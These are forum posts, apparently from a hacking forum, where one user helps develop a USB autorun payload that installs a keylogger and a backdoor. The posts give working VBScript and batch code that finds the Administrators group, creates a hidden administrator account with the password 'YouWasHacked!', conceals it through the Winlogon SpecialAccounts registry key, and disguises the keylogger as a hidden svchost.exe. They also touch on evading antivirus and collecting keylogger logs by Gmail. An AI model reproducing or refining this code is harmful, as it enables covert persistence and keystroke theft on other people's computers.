DMilton

:P It was only a little modified copy-paste, a piece of code from somewere of some payload...

Will be tuned to see it!

You can format the date by using a simple vbScript and passing variables to the batch. Something like this will give you the date-time in a good aspect: Set objShell = CreateObject("Wscript.Shell" Set objEnv = objShell.Environment("PROCESS") strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2) strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2) 'Mes/Dia/Año strFormDate = Right("0" & Month(now()), 2) & "." & Right("0" & Day(now()), 2) & "." & Year(now()) 'HH:MM:SS strFormTime = Right("0" & Hour(now()), 2) & "." & Right("0" & Minute(now()), 2) & "." & Right("0" & Second(now()), 2) objEnv("Date") = strFormDate objEnv("Time") = strFormTime strPath = "YOURBATCH.BAT" objShell.Run strPath, 1, False you can pass the Date and Time vbs variables to the YOURBATCH.BAT to format the time and date of the loggs: \stext %computername%[%Date%-%Time%].txt etc... :EDIT The first line must be: Set objShell = CreateObject("Wscript.Shell")

System.exe detected by NOD32 antivirus as NewHeur_PE (Virus)... When downloading the .rar. With the payload.exe, I get another advice with b2e.dll as Win32/Qhost.NFV (Trojan) with NOD32. Is the b2e.dll part of the backdoor? I think the payload.exe does the payload.bat stuff with the AdminGroup variable given by 1.vbs, installing all the keylogger and backdoor, opening ports, adding reg keys, etc...? Are all the needed programs packed in the payload.exe? The medicine continues going wrong with not conventional paths, It can be done by using a similar way as for installing the payload. I like the easy and effective way the keylogger works but it doesn't work with combination of [ALT]. When a combination is pressed (as [CTRL]+something) the [CTRL] is printed many times... I assume no clicks are saved to the keylogger log... I will be testing some of the functionalities in a few days. Too many things? Good job and many thanks for the credits!

But... What do you want to delete? I think is not very difficult to script it but. What do delete? Many files are running in the background (as system, and user files) and can't be deleted. If you want to delete some of them (as for example some dll or some anvirus file, you must to kill them (see killing av's in this forum) or you must to do it before the system has been restarted (as done by Unlocker). If you tell us what you want to delete, it could be possible to program an application to do the job. Is the job you're thinking a white hat hacking?

We'll try it. Thanks!

Some issues and fixing them... net user Tanto password /add && net localgroup administrators Tanto /add In the adding of Tanto administrator account, the payload only will create it if the Group name of administrators is "administrators" (it's not my case). It will cause an error and will not work for systems wich Administrators Groups have been changed to another name or is installed in other language system. A solution will be getting the correct administrators group name for a secure creating of the Tanto user. This way was the one I was developing in this post. The idea is getting the name of Administrators Group by asking for the S-1-5-32-544 SID and passing it to the payload in a variable. ::Hide Tanto's folder from prying eyes attrib +r +a +s +h %SystemDrive%\docume~1\Tanto Before you attrib anything, you must creating the folder and in the batch code isn't. The correct code would be: ::Create and hide Tanto's folder from prying eyes mkdir %SystemDrive%\docume~1\Tanto attrib +r +a +s +h %SystemDrive%\docume~1\Tanto ::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file ATTRIB +H %windir%\svchost.exe In the attribution of Read-only, Hidden, Archive and System to the keylogger you ommited the +r +a +s Correct line would be: ::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file ATTRIB +r +a +s +hH %windir%\svchost.exe ::Delete Keylogger ( cd %windir% del svchost.exe ) In deletion task of the svchost.exe file, this code will fail because the payload is running from the usb and not de %Systemdrive%. The correct code would be: ::Delete Keylogger del %windir%\svchost.exe SUGGESTIONS I prefer to add the name of the account an the password by putting it in a variable at the beggining of the batch or in an .ini file if it's exe-compiled and can't be eddited, so we can add the user we want and not only Tanto user.

Doesn't work the blogspot rtables?

Windows Firewall works fine and is easy to configure.But if you have a router, configuring both would be the best option for me.

I have a new 8Gb SANDISK usb and get the same problem! Is there any new version available? I have been looking for it but...

The illegalitty is not what you have, but what you do with it... If you do illegalitties, then it's illegal<_<

The only you have to do is logging into gmail and retrieving the files by yourself... The files are attached to the received mail.

The only one I have by the momment is the fault of profiles selection, but I haven't prooved alll the stuf...

I saw it, you have done a fast work, but by the way, I hope, the code I posted will be interesting for someone!

If you want, whe can code an aspirine for you, man! You did it fast and easy, good job, I feel the idea is very good! I'll be testing it during next days. The name of the tool is cool. Sleep a bit by now! :edit By the way, I don't know if the antidote is working, because it doesn't delete the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Tanto user. It doesn't generate the .txt files, only if I exec it from system drive root. When exec it, it leaves three exe files running in Task Manager: beta2.exe, cmd.exe and reg.exe. Antidote doesn't terminate those tasks at all and leaves another reg.exe instance running in background. I think it can be caused because any problem with path names? If you want, PM the source, I'll try a look at it.

Meanwhile you decide what the payload should do, I've been playing with some your firsts ideas. Executing it, will extract the Administrators group name in a sure way for any installation language or even if the user is experimented and has changed it to a variable that can be used by the called batch. The idea of using a batch called program is to continue in the batch way you mentioned, but because I don't know how extract the real Administrators Group name in command line, I did it in VbScript, ready to use. By the way, here it is the code for the VbScript 'ListAdminGroup.vbs Set objWshNetwork = CreateObject("WScript.Network") Set objShell = CreateObject("Wscript.Shell") Set objEnv = objShell.Environment("PROCESS") str_PC = objWshNetwork.ComputerName ' SID of the Administrators group str_GroupSID = "S-1-5-32-544" str_GroupName = GetGroupName(str_PC, str_GroupSID) Set obj_Group = GetObject("WinNT://" &amp; str_PC &amp; "/" _ &amp; str_GroupName &amp; ",group") objEnv("AdminGroup") = str_GroupName strPath = "start.bat" objShell.Run strPath, 1, False Function GetGroupName(sComputer, sGroupSID) Dim oGroupAccounts, oGroupAccount 'Set for WinXP Set oGroupAccounts = GetObject( _ "winmgmts://" &amp; sComputer &amp; "/root/cimv2") _ .ExecQuery("Select Name from Win32_Group" _ &amp; " WHERE Domain = '" &amp; sComputer &amp; "' AND SID = '" &amp; sGroupSID &amp; "'") 'For Win2k we use the 'BUILTIN' domain If oGroupAccounts.Count = 0 Then Set oGroupAccounts = GetObject( _ "winmgmts://" &amp; sComputer &amp; "/root/cimv2") _ .ExecQuery("Select Name from Win32_Group" _ &amp; " WHERE Domain = 'BUILTIN' AND SID = '" &amp; sGroupSID &amp; "'") End If For Each oGroupAccount In oGroupAccounts GetGroupName = oGroupAccount.Name Next End Function I think it will work in Windows XP and Windows 2000 but if you can play with it in other versions, will be great. Once the script has finished, it launches the start.bat batch. It will create an administrator account wich name is defined in %NewAdmin% variable, with a password given by %password% variable, and adding it into Administrators Group, using the variable in %AdminGroup% given by the vbs. Creates the correct folder, hides it, and add the new account name to the Special Accounts, for being invisible to the user. Here it is the start.bat code. By the way, it must be on same dir as VbScript. ::start.bat @echo off set NewAdmin=USBAdmin set password=YouWasHacked! set Folder=%SystemDrive%\Documents and Settings\%NewAdmin% net localgroup %AdminGroup% %NewAdmin% /add net user %NewAdmin% %password% /add REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NewAdmin% /t REG_DWORD /d 0 mkdir "%Folder%" attrib +a +s +h "%Folder%" It will solve too the Tcstool for fewer fingerprints: About Tcstool quesion: The code for Users.vbs can be: 'Users.vbs Option Explicit Dim obj_UserName Dim obj_GroupName Dim obj_PC Dim obj_Group Dim obj_Shell Dim str_Computer Dim str_Name Dim objFSO Dim objTextFile Dim str_File Dim M Const ForReading = 1, ForWriting = 2, ForAppending = 8 If WScript.Arguments.count &gt; 0 Then str_File = WScript.Arguments.item(0) Else str_File = "users.txt" End If Set objFSO = CreateObject("Scripting.FileSystemObject") Set objTextFile = objFSO.OpenTextFile (str_File, ForWriting, True) str_Computer = "." Set obj_Shell = CreateObject("WScript.Shell") str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%") Set obj_PC = GetObject("WinNT://" &amp; str_Computer &amp; ",Computer") obj_PC.Filter = Array("Group") For Each obj_GroupName In obj_PC Set obj_Group = GetObject("WinNT://" &amp; str_Computer &amp; "/" &amp; obj_GroupName.Name &amp; ",Group") obj_Group.members.Filter = Array("User") For Each obj_UserName In obj_Group.members set M = obj_UserName objTextFile.WriteLine(obj_UserName.Name) Next Next It will extract all users names in a new users.txt file, for further use of it. And that's all by the momment!

I'm cleaning the code you posted, doing it efficient in any instalation language system, adding some other and it will be posted as soon as I have it working right.

You can uninstall U3 software and installing it. In SANDISK web, you can donwload utils to do it. Also is a troubleshooting guide HERE Try it and tell us if it went ok.

That's occurs when one can't try it in Server 2003... Ok, another thing to think about! <_< I'll be squishing my little brain to find a solution (in batch) for helping in the payload development. Thanks a lot for your memo moonlit.

For the point 5. you can execute this code, it's in VbScript. Of course, it can be moddified to show only the users and not the groups... UsersGroups.vbs 'UsersGroups.vbs 'This script enumerates users, grouped for each local group in a computer 'It creates a new file called users.txt in the same directory from it's executed. 'The code has been rebuilded from a similar app, but it works fine 'DMilton for free community 'Thread post at http://hak5.org/forums/index.php?showtopic=10746 'Variables explicit declaration Option Explicit Dim obj_UserName Dim obj_GroupName Dim obj_PC Dim obj_Group Dim obj_Shell Dim str_PC Dim str_Name Dim objFSO Dim objTextFile Dim I Dim ExitFile Const ForReading = 1, ForWriting = 2, ForAppending = 8 'Arguments ExitFile = "users.txt" 'Exit file creation Set objFSO = CreateObject("Scripting.FileSystemObject") Set objTextFile = objFSO.OpenTextFile (ExitFile, ForWriting, True) 'Local computer var creation str_Name str_PC = "." Set obj_Shell = CreateObject("WScript.Shell") str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%") 'Creates an object obj_PC containing actual local computer Set obj_PC = GetObject("WinNT://" &amp; str_PC &amp; ",Computer") ObjTextFile.WriteLine("Computer name is: " &amp; str_Name) 'Now we filter objects to obtain groups obj_PC.Filter = Array("Group") 'Going through the objects and writting the txt For Each obj_GroupName In obj_PC 'Creating an object obj_Group containing actual group Set obj_Group = GetObject("WinNT://" &amp; str_PC &amp; "/" &amp; obj_GroupName.Name &amp; ",Group") 'Writting the txt and formatting it objTextFile.WriteLine("Users from Group: " &amp; obj_GroupName.Name) 'Filtering objects from the group to obtain users obj_Group.members.Filter = Array("User") 'Printing each one user For Each obj_UserName In obj_Group.members objTextFile.WriteLine(" " &amp; obj_UserName.Name) Next Next 'Cleaning the variables Set obj_UserName = Nothing Set obj_GroupName = Nothing Set obj_PC = Nothing Set obj_Shell = Nothing Moreover, I think that with groups info in the final users.txt, adding a key in registry for creating an admin account is simple, or not? net user "USBAdmin" /add net localgroup administrator "USBAdmin" /add net user "USBAdmin" password The problem with adding privileges is that this automation would work in English versions but not in other languages as Spanish, where Administrators group is named Administradores, but with the listed groups in the vbs, you can extract easily the "Admin"-istrator or "Admin"-istradores correct word to add the correct privileges. Finaly, it would be necessary, adding the "USBAdmin" to the Special Account Users List, by adding a DWORD 0 to the created "USBAdmin" by executing in a batch (or whatelse). In this case, from command line would be... REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USBAdmin /t REG_DWORD /d 0 :P

Those ones are the latest and in my oppinion, the bests ones to work with, but you can also add the U3 Incident Response Payload that, very basically, it's used to get forensic information from the PC. Read the topic, I think it'll be interesting U3 Incident Response Payload

That's cool man! You get the non .Net Framework version and it looks fine. Thanks for your effort in this. How did you avoid the using of .Net Framework? Other thing is... the profile selector... But looks ok. I'll be testing it for a while and waiting for Leapo's updates to make it better.

It'll be perfect that you do it by yourself, by looking for the outdated files (the most we can find at nirsoft website), searching and grabbing the Internet, recopiling some interesting posts containing new code for implementation, the GonZor 2.0 version... etc And when you have it, the best is that you post it. You can upload the files to the packages point, can correct the obsoltete wiki contents, can code some new stuff and create a great usb payload with all this. Jokes appart, the one you are looking for is out of there, the only you have to do is search for it ElevenWarrior. As I told you a few days ago, googleing is one of the bests ways to find out what you want, and if not found... search again, and finally: asking.

Fine, but next time, I suggest you the search tool or googleing it... If it took me about 30 secs to find it, probably you would be able to find it too! Searching is the best way to find what you're looking for and it's a good way to find very interesting things you're not looking for too.

Of course, you can install the original version of the U3 CRUZER from SANDISK...